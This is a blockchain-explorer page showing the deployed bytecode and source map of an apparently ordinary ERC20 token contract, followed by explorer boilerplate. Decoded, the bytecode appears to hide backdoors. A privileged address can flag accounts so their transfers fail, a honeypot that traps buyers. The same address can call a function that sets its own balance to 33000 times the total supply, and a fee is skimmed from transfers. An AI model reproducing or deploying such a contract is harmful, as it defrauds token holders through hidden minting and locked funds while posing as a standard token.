5b6103d66000610a21565b565b6060600680546102e190610bc6565b600354336001600160a01b039091160361041f576001600160a01b0381166000908152600760205260409020805460ff191660011790555b50565b6000338161043082866104e5565b9050838110156104955760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b61039782868684036105d8565b600033610372818585610776565b600354336001600160a01b039091160361041f576001600160a01b03166000908152600760205260409020805460ff19169055565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6105186109c7565b6001600160a01b03811661057d5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161048c565b61041f81610a21565b6003546001600160a01b0316336001600160a01b0316146105a357565b600354336001600160a01b03909116036103d6576004546105c6906180e8610c29565b33600090815260016020526040902055565b6001600160a01b03831661063a5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161048c565b6001600160a01b03821661069b5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161048c565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b600061070884846104e5565b9050600019811461077057818110156107635760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604482015260640161048c565b61077084848484036105d8565b50505050565b6001600160a01b0383166107da5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161048c565b6001600160a01b03821661083c5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161048c565b6001600160a01b03831660009081526001602090815260408083205460079092529091205460ff1615610892576004546001600160a01b03851660009081526001602052604090205461088f9190610c40565b90505b818110156108f15760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161048c565b6108fb8183610a71565b6001600160a01b0385166000908152600160205260408120919091556008546109329060649061092c908690610a84565b90610a90565b6001600160a01b03851660009081526001602052604090205490915061096490829061095e9086610a9c565b90610a71565b6001600160a01b0380861660008181526001602052604090819020939093559151908716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109b89087815260200190565b60405180910390a35050505050565b6000546001600160a01b031633146103d65760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161048c565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6000610a7d8284610c40565b9392505050565b6000610a7d8284610c29565b6000610a7d8284610c53565b6000610a7d8284610c16565b600060208083528351808285015260005b81811015610ad557858101830151858201604001528201610ab9565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610b0d57600080fd5b919050565b60008060408385031215610b2557600080fd5b610b2e83610af6565b946020939093013593505050565b600060208284031215610b4e57600080fd5b610a7d82610af6565b600080600060608486031215610b6c57600080fd5b610b7584610af6565b9250610b8360208501610af6565b9150604084013590509250925092565b60008060408385031215610ba657600080fd5b610baf83610af6565b9150610bbd60208401610af6565b90509250929050565b600181811c90821680610bda57607f821691505b602082108103610bfa57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561037857610378610c00565b808202811582820484141761037857610378610c00565b8181038181111561037857610378610c00565b600082610c7057634e487b7160e01b600052601260045260246000fd5b50049056fea2646970667358221220fbebf52d7488b8b2f24413d89b9a10c3a30648fabc3e36da47da7866538ca55664736f6c63430008110033

Deployed Bytecode Sourcemap

9374:11098:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11138:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13441:193;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;13441:193:0;1004:187:1;10063:104:0;;;;;;:::i;:::-;-1:-1:-1;;;;;10145:14:0;10120:4;10145:14;;;:9;:14;;;;;;;;;10063:104;12238:102;12318:14;;12238:102;;;1533:25:1;;;1521:2;1506:18;12238:102:0;1387:177:1;14214:287:0;;;;;;:::i;:::-;;:::i;12088:85::-;;;12163:2;2044:36:1;;2032:2;2017:18;12088:85:0;1902:184:1;14910:238:0;;;;;;:::i;:::-;;:::i;12403:119::-;;;;;;:::i;:::-;-1:-1:-1;;;;;12496:18:0;12469:7;12496:18;;;:9;:18;;;;;;;12403:119;8553:103;;;:::i;:::-;;7903:87;7949:7;7976:6;-1:-1:-1;;;;;7976:6:0;7903:87;;;-1:-1:-1;;;;;2255:32:1;;;2237:51;;2225:2;2210:18;7903:87:0;2091:203:1;11351:98:0;;;:::i;9914:141::-;;;;;;:::i;:::-;;:::i;15651:424::-;;;;;;:::i;:::-;;:::i;12730:185::-;;;;;;:::i;:::-;;:::i;9760:146::-;;;;;;:::i;:::-;;:::i;9574:29::-;;;;;-1:-1:-1;;;;;9574:29:0;;;12978:143;;;;;;:::i;:::-;;:::i;8811:201::-;;;;;;:::i;:::-;;:::i;10284:232::-;;;:::i;11138:94::-;11184:13;11217:7;11210:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11138:94;:::o;13441:193::-;13516:4;6778:10;13572:32;6778:10;13588:7;13597:6;13572:8;:32::i;:::-;13622:4;13615:11;;;13441:193;;;;;:::o;14214:287::-;14337:4;6778:10;14395:38;14411:4;6778:10;14426:6;14395:15;:38::i;:::-;14444:27;14454:4;14460:2;14464:6;14444:9;:27::i;:::-;-1:-1:-1;14489:4:0;;14214:287;-1:-1:-1;;;;14214:287:0:o;14910:238::-;14998:4;6778:10;15054:64;6778:10;15070:7;15107:10;15079:25;6778:10;15070:7;15079:9;:25::i;:::-;:38;;;;:::i;:::-;15054:8;:64::i;8553:103::-;7787:15;:13;:15::i;:::-;8618:30:::1;8645:1;8618:18;:30::i;:::-;8553:103::o:0;11351:98::-;11399:13;11432:9;11425:16;;;;;:::i;9914:141::-;9970:13;;6778:10;-1:-1:-1;;;;;9970:13:0;;;:29;9966:82;;-1:-1:-1;;;;;10015:14:0;;;;;;:9;:14;;;;;:21;;-1:-1:-1;;10015:21:0;10032:4;10015:21;;;9966:82;9914:141;:::o;15651:424::-;15744:4;6778:10;15744:4;15827:25;6778:10;15844:7;15827:9;:25::i;:::-;15800:52;;15891:15;15871:16;:35;;15863:85;;;;-1:-1:-1;;;15863:85:0;;3413:2:1;15863:85:0;;;3395:21:1;3452:2;3432:18;;;3425:30;3491:34;3471:18;;;3464:62;-1:-1:-1;;;3542:18:1;;;3535:35;3587:19;;15863:85:0;;;;;;;;;15976:60;15985:5;15992:7;16020:15;16001:16;:34;15976:8;:60::i;12730:185::-;12801:4;6778:10;12857:28;6778:10;12874:2;12878:6;12857:9;:28::i;9760:146::-;9820:13;;6778:10;-1:-1:-1;;;;;9820:13:0;;;:29;9816:83;;-1:-1:-1;;;;;9865:14:0;9882:5;9865:14;;;:9;:14;;;;;:22;;-1:-1:-1;;9865:22:0;;;9760:146::o;12978:143::-;-1:-1:-1;;;;;13086:18:0;;;13059:7;13086:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;12978:143::o;8811:201::-;7787:15;:13;:15::i;:::-;-1:-1:-1;;;;;8900:22:0;::::1;8892:73;;;::::0;-1:-1:-1;;;8892:73:0;;3819:2:1;8892:73:0::1;::::0;::::1;3801:21:1::0;3858:2;3838:18;;;3831:30;3897:34;3877:18;;;3870:62;-1:-1:-1;;;3948:18:1;;;3941:36;3994:19;;8892:73:0::1;3617:402:1::0;8892:73:0::1;8976:28;8995:8;8976:18;:28::i;10284:232::-:0;10344:13;;-1:-1:-1;;;;;10344:13:0;6778:10;-1:-1:-1;;;;;10328:29:0;;10324:68;;10284:232::o;10324:68::-;10406:13;;6778:10;-1:-1:-1;;;;;10406:13:0;;;:29;10402:107;;12318:14;;10477:20;;10492:5;10477:20;:::i;:::-;6778:10;10451:23;;;;:9;:23;;;;;:46;10284:232::o;19357:380::-;-1:-1:-1;;;;;19493:19:0;;19485:68;;;;-1:-1:-1;;;19485:68:0;;4399:2:1;19485:68:0;;;4381:21:1;4438:2;4418:18;;;4411:30;4477:34;4457:18;;;4450:62;-1:-1:-1;;;4528:18:1;;;4521:34;4572:19;;19485:68:0;4197:400:1;19485:68:0;-1:-1:-1;;;;;19572:21:0;;19564:68;;;;-1:-1:-1;;;19564:68:0;;4804:2:1;19564:68:0;;;4786:21:1;4843:2;4823:18;;;4816:30;4882:34;4862:18;;;4855:62;-1:-1:-1;;;4933:18:1;;;4926:32;4975:19;;19564:68:0;4602:398:1;19564:68:0;-1:-1:-1;;;;;19645:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;19697:32;;1533:25:1;;;19697:32:0;;1506:18:1;19697:32:0;;;;;;;19357:380;;;:::o;20028:441::-;20163:24;20190:25;20200:5;20207:7;20190:9;:25::i;:::-;20163:52;;-1:-1:-1;;20230:16:0;:37;20226:236;;20312:6;20292:16;:26;;20284:68;;;;-1:-1:-1;;;20284:68:0;;5207:2:1;20284:68:0;;;5189:21:1;5246:2;5226:18;;;5219:30;5285:31;5265:18;;;5258:59;5334:18;;20284:68:0;5005:353:1;20284:68:0;20388:51;20397:5;20404:7;20432:6;20413:16;:25;20388:8;:51::i;:::-;20152:317;20028:441;;;:::o;16573:757::-;-1:-1:-1;;;;;16710:24:0;;16702:74;;;;-1:-1:-1;;;16702:74:0;;5565:2:1;16702:74:0;;;5547:21:1;5604:2;5584:18;;;5577:30;5643:34;5623:18;;;5616:62;-1:-1:-1;;;5694:18:1;;;5687:35;5739:19;;16702:74:0;5363:401:1;16702:74:0;-1:-1:-1;;;;;16795:16:0;;16787:64;;;;-1:-1:-1;;;16787:64:0;;5971:2:1;16787:64:0;;;5953:21:1;6010:2;5990:18;;;5983:30;6049:34;6029:18;;;6022:62;-1:-1:-1;;;6100:18:1;;;6093:33;6143:19;;16787:64:0;5769:399:1;16787:64:0;-1:-1:-1;;;;;16879:21:0;;16862:15;16879:21;;;:9;:21;;;;;;;;;16915:9;:21;;;;;;;;;:30;16911:110;;12318:14;;-1:-1:-1;;;;;16971:21:0;;;;;;:9;:21;;;;;;:38;;;;:::i;:::-;16962:47;;16911:110;17052:6;17041:7;:17;;17033:68;;;;-1:-1:-1;;;17033:68:0;;6508:2:1;17033:68:0;;;6490:21:1;6547:2;6527:18;;;6520:30;6586:34;6566:18;;;6559:62;-1:-1:-1;;;6637:18:1;;;6630:36;6683:19;;17033:68:0;6306:402:1;17033:68:0;17136:19;:7;17148:6;17136:11;:19::i;:::-;-1:-1:-1;;;;;17112:21:0;;;;;;:9;:21;;;;;:43;;;;17193:7;;17182:28;;17206:3;;17182:19;;:6;;:10;:19::i;:::-;:23;;:28::i;:::-;-1:-1:-1;;;;;17238:13:0;;;;;;:9;:13;;;;;;17166:44;;-1:-1:-1;17238:36:0;;17166:44;;17238:25;;17256:6;17238:17;:25::i;:::-;:29;;:36::i;:::-;-1:-1:-1;;;;;17221:13:0;;;;;;;:9;:13;;;;;;;:53;;;;17290:32;;;;;;;;;;17315:6;1533:25:1;;1521:2;1506:18;;1387:177;17290:32:0;;;;;;;;16691:639;;16573:757;;;:::o;8068:134::-;7949:7;7976:6;-1:-1:-1;;;;;7976:6:0;6778:10;8134:23;8126:68;;;;-1:-1:-1;;;8126:68:0;;6915:2:1;8126:68:0;;;6897:21:1;;;6934:18;;;6927:30;6993:34;6973:18;;;6966:62;7045:18;;8126:68:0;6713:356:1;9172:191:0;9246:16;9265:6;;-1:-1:-1;;;;;9282:17:0;;;-1:-1:-1;;;;;;9282:17:0;;;;;;9315:40;;9265:6;;;;;;;9315:40;;9246:16;9315:40;9235:128;9172:191;:::o;2894:98::-;2952:7;2979:5;2983:1;2979;:5;:::i;:::-;2972:12;2894:98;-1:-1:-1;;;2894:98:0:o;3251:::-;3309:7;3336:5;3340:1;3336;:5;:::i;3650:98::-;3708:7;3735:5;3739:1;3735;:5;:::i;2513:98::-;2571:7;2598:5;2602:1;2598;:5;:::i;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1196:186::-;1255:6;1308:2;1296:9;1287:7;1283:23;1279:32;1276:52;;;1324:1;1321;1314:12;1276:52;1347:29;1366:9;1347:29;:::i;1569:328::-;1646:6;1654;1662;1715:2;1703:9;1694:7;1690:23;1686:32;1683:52;;;1731:1;1728;1721:12;1683:52;1754:29;1773:9;1754:29;:::i;:::-;1744:39;;1802:38;1836:2;1825:9;1821:18;1802:38;:::i;:::-;1792:48;;1887:2;1876:9;1872:18;1859:32;1849:42;;1569:328;;;;;:::o;2299:260::-;2367:6;2375;2428:2;2416:9;2407:7;2403:23;2399:32;2396:52;;;2444:1;2441;2434:12;2396:52;2467:29;2486:9;2467:29;:::i;:::-;2457:39;;2515:38;2549:2;2538:9;2534:18;2515:38;:::i;:::-;2505:48;;2299:260;;;;;:::o;2564:380::-;2643:1;2639:12;;;;2686;;;2707:61;;2761:4;2753:6;2749:17;2739:27;;2707:61;2814:2;2806:6;2803:14;2783:18;2780:38;2777:161;;2860:10;2855:3;2851:20;2848:1;2841:31;2895:4;2892:1;2885:15;2923:4;2920:1;2913:15;2777:161;;2564:380;;;:::o;2949:127::-;3010:10;3005:3;3001:20;2998:1;2991:31;3041:4;3038:1;3031:15;3065:4;3062:1;3055:15;3081:125;3146:9;;;3167:10;;;3164:36;;;3180:18;;:::i;4024:168::-;4097:9;;;4128;;4145:15;;;4139:22;;4125:37;4115:71;;4166:18;;:::i;6173:128::-;6240:9;;;6261:11;;;6258:37;;;6275:18;;:::i;7074:217::-;7114:1;7140;7130:132;;7184:10;7179:3;7175:20;7172:1;7165:31;7219:4;7216:1;7209:15;7247:4;7244:1;7237:15;7130:132;-1:-1:-1;7276:9:1;;7074:217::o

Swarm Source

ipfs://fbebf52d7488b8b2f24413d89b9a10c3a30648fabc3e36da47da7866538ca556
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.